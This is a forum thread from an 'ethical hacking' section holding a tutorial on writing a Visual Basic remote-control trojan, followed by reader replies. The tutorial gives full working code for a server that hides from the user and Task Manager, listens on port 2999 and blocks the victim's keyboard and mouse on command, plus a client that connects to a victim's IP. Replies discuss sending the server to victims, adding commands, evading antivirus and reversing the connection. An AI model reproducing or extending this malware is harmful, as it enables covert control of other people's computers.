Go4Expert

Go4Expert (http://www.go4expert.com/)
-   Ethical hacking Tips (http://www.go4expert.com/articles/ethical-hacking-tutorials/)
-   -   Simple trojan in vb ..... (only for learning) (http://www.go4expert.com/articles/simple-trojan-vb-learning-t178/)

vishal sharma 25Sep2004 14:45

Simple trojan in vb ..... (only for learning)
 
Writing a Trojan is a lot easier than most people think. All it really involves is two simple applications both with fewer than 100 lines of code. The first application is the client or the program that one user knows about. The second is the server or the actual “trojan” part. I will now go through what you need for both and some sample code.

Server
The server is the Trojan part of the program. You usually will want this to be as hidden as possible so the average user can’t find it. To do this you start by using

Code: VB

Private Sub Form_Load()
     Me.Visible = False
End Sub

This little bit of code makes the program invisible to the naked eye. Now we all know that the task manager is a little bit peskier. So to get our application hidden from that a little better we make our code look like this.

Code: VB

Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
End Sub

So now, we have a program that is virtually invisible to the average user, and it only took four lines of code. Now all of you are thinking that this tutorial sucks right about now so lets make it a lot better by adding functions to our Trojan!
The first thing we want to do is make it be able to listen for connections when it loads. So in order to do this we need to add a Winsock Control. I named my control win but you can name yours what ever.

Now to make it listen on port 2999 when the Trojan starts up we make our code look like this.
Code: VB

Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
     win.LocalPort = 2999
     win.RemotePort = 455
     win.Listen
End Sub

This code will set the local open port to 2999 and the port it sends it to is 455. So now, we have a program that listens but still doesn’t do anything neat. Lets make it block the input of the user completely when we tell it to!

To do this little devious thing we need to add a module with the following code

Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long

Then we add this code to our main form:

Code: VB

Private Sub win_ConnectionRequest(ByVal requestID As Long)
     win.Close
     win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
    win.GetData GotDat
    DoActions (GotDat)
End Sub

The code in the module is called a windows API. It uses a dll file to do tasks that we want. Now this code still won’t block the users input but we are very close. We now need to program the DoActions function that we called on our main form. In case you were wondering the code that we added to the form does two different things. The first sub makes it so all connection requests are automatacly accepted. The second sub makes it so all data is automaticly accepted and it then passes all of the data to the function DoActions which we are about to code.

For the DoActions code, we want to make a public function in the module. So add this code to the module and we are about done with the server of the Trojan!

Code: VB

Public Function DoActions(x As String)
     Dim Action
     Select Case x
             Case "block"
             Action = BlockInput(True)
     End Select
End Function

Ok now we have a program that when the data “block” is sent to it on port 2999 it will block the users input. I made a Select Case statement so it is easy to modify this code to your own needs later on. I recommend adding a unblock feature of your own. To do that just call the BlockInput function with the argument False instead of true.

Main Form
Code: VB

Private Sub Form_Load()
     Me.Visible = False
     App.TaskVisible = False
     win.LocalPort = 2999
     win.RemotePort = 455
     win.Listen
End Sub

Private Sub win_ConnectionRequest(ByVal requestID As Long) ' As corrected by Darkness1337
     win.Close
     win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
     win.GetData GotDat
     DoActions (GotDat)
End Sub

Remember to add your winsock control and name it to win if you use this code.

Code: VB

Module

Public Declare Function BlockInput Lib "user32" (ByVal fBlock As Long) As Long                     

Public Function DoActions(x As String)
     Dim Action
     Select Case x
               Case "block"
               Action = BlockInput(True)
     End Select
End Function

That’s all there is to the server side or Trojan part of it. Now on to the Client.

Client

The client will be what you will interact with. You will use it to connect to the remote server (trojan) and send it commands. Since we made a server that accepts the command of “block” lets make a client that sends the command “block”.

Make a form and add a Winsock Control, a text box, and three buttons. The Text box should be named txtIP if you want it to work with this code. In addition, your buttons should be named cmdConnect, cmdBlockInput, and cmdDisconnect. Now lets look at the code we would use to make our Client.

Code: VB

Private Sub cmdConnect_Click()
     IpAddy = txtIp.Text
     Win.Close
     Win.RemotePort = 2999
     Win.RemoteHost = IpAddy
     Win.LocalPort = 9999
     Win.Connect
     cmdConnect.Enabled = False
End Sub

Private Sub cmdDisconnect_Click()
     Win.Close
     cmdConnect.Enabled = True
End Sub
           
Private Sub cmdBlockInput_Click()
     Win.SendData "block"
End Sub

That is the code for the client. All it does is gets the Ip Adress from txtIp and connects to it on remote port 2999. Then when connected you can send the “block” data to block off their input.

shabbir 26Sep2004 09:09

Re: Simple trojan in vb ..... (only for learning)
 
:cool: kool one.

Unregistered 25Feb2005 10:41

Re: Simple trojan in vb ..... (only for learning)
 
I was loosing interest in VB but this Articles as made me open my VB book again.

ocena 6Aug2006 13:22

Re: Simple trojan in vb ..... (only for learning)
 
I have search the internet for a possible trojan created in vb. well, it rocks

jirat 31Oct2006 18:35

Re: Simple trojan in vb ..... (only for learning)
 
very cool :)

Sophia01 6Dec2006 04:39

Re: Simple trojan in vb ..... (only for learning)
 
nice one..

bokiratx 12Dec2006 18:27

Re: Simple trojan in vb ..... (only for learning)
 
cool :-)

zylyz 27Dec2006 02:06

Re: Simple trojan in vb ..... (only for learning)
 
did any one compile it and try it out on

ReekenX 25Jan2007 03:24

Re: Simple trojan in vb ..... (only for learning)
 
Cool tutorial ;)

shabbir 25Jan2007 08:59

Re: Simple trojan in vb ..... (only for learning)
 
Quote:

Originally Posted by ReekenX
Cool tutorial ;)

Confine links to signature only

willing 10Mar2007 22:51

Re: Simple trojan in vb ..... (only for learning)
 
Quote:

Originally Posted by shabbir
Confine links to signature only

Hey,
I'm new to prgramming on the whole. Followed code above. Stupid ques, when finished making lets say frmClient and frmServer do we save it as a project an then make the project a .exe.
Do i have to compile before we save or make a .exe. Is compile the play button, becuase when i did after creating each form i that didn't get back like a process completed e.g jcreator

How do i end up with a client.exe and a server.exe at the end of the day. Do we send the server.exe like a normal trojan to our victim and we run client.exe on our pc.

If so , how to i actually use the client to connect to victim, what interface and how?
Sorry for Stupid ques, i could imagine how i am sounding. I am really interested in learning code and i have been reading a good bit. i pick up fairly fast, and i understand enough to appreciate a helping hand. thanks on responses, cheers

Darkness1337 20Mar2007 04:56

Re: Simple trojan in vb ..... (only for learning)
 
woh! greate tutorials! keep it up :D

thanx~ ;)

uday kumar ujjwal 3Apr2007 17:31

Re: Simple trojan in vb ..... (only for learning)
 
good

tarencer 16May2007 10:13

Re: Simple trojan in vb ..... (only for learning)
 
hey guys m new to this forum.......
however i wuld like to ask a small question on the code ?

if i put another command button ie to unblock the input say cmdUnblockInput

Code:

Private Sub cmdUnblockInput_Click()
    Win.SendData "Unblock"
End Sub

and i add the foll:
Code:

      Select Case x
              Case "block"
                    Action = BlockInput(True)
              Case "Unblock"
                    Action = BlockInput(False)
    End Select

ok dats for the coding part now for the implementation part

now if u click on cmdBlockInput it blocks the input devices from..............

but now wen u press cmdUnblockInput it doesnt unblock the input devices.......

dat is no reconnection is made to the trojan part of the computer...........
dat is the trojan part of the computer should be in the "listening" state again which is not in this case........
i just want to know how to do so???

hope i get the ans for my 1st question on this forum?

shabbir 16May2007 10:35

Re: Simple trojan in vb ..... (only for learning)
 
tarencer, have a separate thread for your query and not in the discussion of the article.

Also provide a good and relevant topic as well as have it in the right section.

Darkness1337 18May2007 01:39

Re: Simple trojan in vb ..... (only for learning)
 
This is GREAT, WOW, :)

but just to show you a little spelling mistake, which would bug the whole program....

check the bit in bold, it should be Private Instead of Pivate

Pivate Sub win_ConnectionRequest(ByVal requestID As Long)
win.Close
win.Accept requestID
End Sub

Private Sub win_DataArrival(ByVal bytesTotal As Long)
win.GetData GotDat
DoActions (GotDat)
End Sub

.....


nice work! :) love ya... lol

shabbir 18May2007 07:57

Re: Simple trojan in vb ..... (only for learning)
 
I have corrected the error. Thanks for pointing that out.

Darkness1337 18May2007 22:57

Re: Simple trojan in vb ..... (only for learning)
 
No probs.... Thanx for correcting it...

I'm having problem with this, I created it and Published it (*.exe) i run server(so it active) then opened my client unit, typed my IP in and click connect, it worked fine till that point but when I click on BLOCK INPUT it didnt work, it kept saying
Quote:

"RUN-TIME ERROR 40006"
Wrong protocol or connection state for the requested transaction or request
:(

is there any thing that I can do to get it right? :)

kiran7 24May2007 15:50

Re: Simple trojan in vb ..... (only for learning)
 
Good code.
Hope nobody creates a real trojan out of this.

Bhullarz 8Jul2007 06:56

Re: Simple trojan in vb ..... (only for learning)
 
Seems to be good tutorial but not working for me. Detected by Kaspersky as Generic Trojan

tong 24Aug2007 14:03

Re: Simple trojan in vb ..... (only for learning)
 
hi...i am interested in learning this ......i would like to ask for more detail .TQ

tunnelRat 19Oct2007 05:12

Re: Simple trojan in vb ..... (only for learning)
 
hey how would i make that module ?

tunnelRat 19Oct2007 05:44

Re: Simple trojan in vb ..... (only for learning)
 
fore some reason when i try to make it exe it wont let me cause it turn red on this line of code cmdconnect.Enabled = True and when i try to make the server exe it wont let me cause it says compile error on win.listin part of code so i cant make em exe cause you please tell me how tofix thepromblem ?

NuLLByTe 19Oct2007 23:59

Re: Simple trojan in vb ..... (only for learning)
 
Usually, VB trojans are very fast detected by AV-s :)

I would go with C++ for making trojans ;)

By the way, nice article, useful for newbies :)

Safari 20Oct2007 10:47

Re: Simple trojan in vb ..... (only for learning)
 
The non techi guys like me tend to start with VB as C++ and Win32 seems to be too difficult to start of

sreeja 13Nov2007 15:42

Re: Simple trojan in vb ..... (only for learning)
 
I cannot understand what is this ethical hacking.

shabbir 13Nov2007 17:14

Re: Simple trojan in vb ..... (only for learning)
 
Quote:

Originally Posted by sreeja
I cannot understand what is this ethical hacking.

Hacking for good cause and safe guard yourself. Something like if you know how to break anything you also know how to get out of it.

Aryan_illsuion 16Nov2007 16:43

Re: Simple trojan in vb ..... (only for learning)
 
well for this to work properly you need to have the IP of the server(or the victim).. what if you don't the ip?...
what about making the trojan a client and the program which sends the commands the server... this way you if your IP is static all your client programs know where to connect...

Or is there some other way around this...?

actually i've been trying hard lately to this solve this problem but to no result...

hanleyhansen 25Jan2008 20:47

Re: Simple trojan in vb ..... (only for learning)
 
Hreat Tutorial!!

Omen 19May2008 04:01

Re: Simple trojan in vb ..... (only for learning)
 
Quote:

Originally Posted by hanleyhansen
Hreat Tutorial!!


LOL !

lavendalla 29May2008 06:39

Re: Simple trojan in vb ..... (only for learning)
 
I am trying to write this. it is not a good sign when i cannot get past the first two lines of code. where it says App.TaskVisible = False i get on of those annoying error lines under App :confused: . I also cannot find a winsock controll anywhere :shout: . What version of VB is this written in? I am assuming(incorrectly?) that VB stands for visual basic. corrrect me if im wroung. thx in advance

lavendalla 30May2008 01:44

Re: Simple trojan in vb ..... (only for learning)
 
nvm, i sucessfully wrote it in VB6. I was using 2005 express edition.

ivo75 22Oct2008 01:20

Re: Simple trojan in vb ..... (only for learning)
 
when I click on BLOCK INPUT it didnt work, it kept saying

"RUN-TIME ERROR 40006"
Wrong protocol or connection state for the requested transaction or request

please say me why?

NDL 22Oct2008 14:25

Re: Simple trojan in vb ..... (only for learning)
 
nice one

dom2k3 4Jan2009 08:26

Re: Simple trojan in vb ..... (only for learning)
 
has anybody built apon this code? if so anyone care to help a VB Noob to expand the DoAction function?

CircuitX 3Feb2009 02:48

Re: Simple trojan in vb ..... (only for learning)
 
Nice :D:D:D.

ausan 3Feb2009 16:46

Re: Simple trojan in vb ..... (only for learning)
 
seems very intresting,i will try it

MDK 25Feb2009 05:46

Re: Simple trojan in vb ..... (only for learning)
 
Sorry...

Crappy *** Trojan.

And a Fail.

Uhmmm 14Aug2009 16:34

Re: Simple trojan in vb ..... (only for learning)
 
Uhmmm Could Anyone convert this to vb.net ? I would be very grateful Sry for bad english i'm from serbia

naimish 14Aug2009 16:35

Re: Simple trojan in vb ..... (only for learning)
 
I'll try to convert this into vb.net :D


All times are GMT +5.5. The time now is 00:33.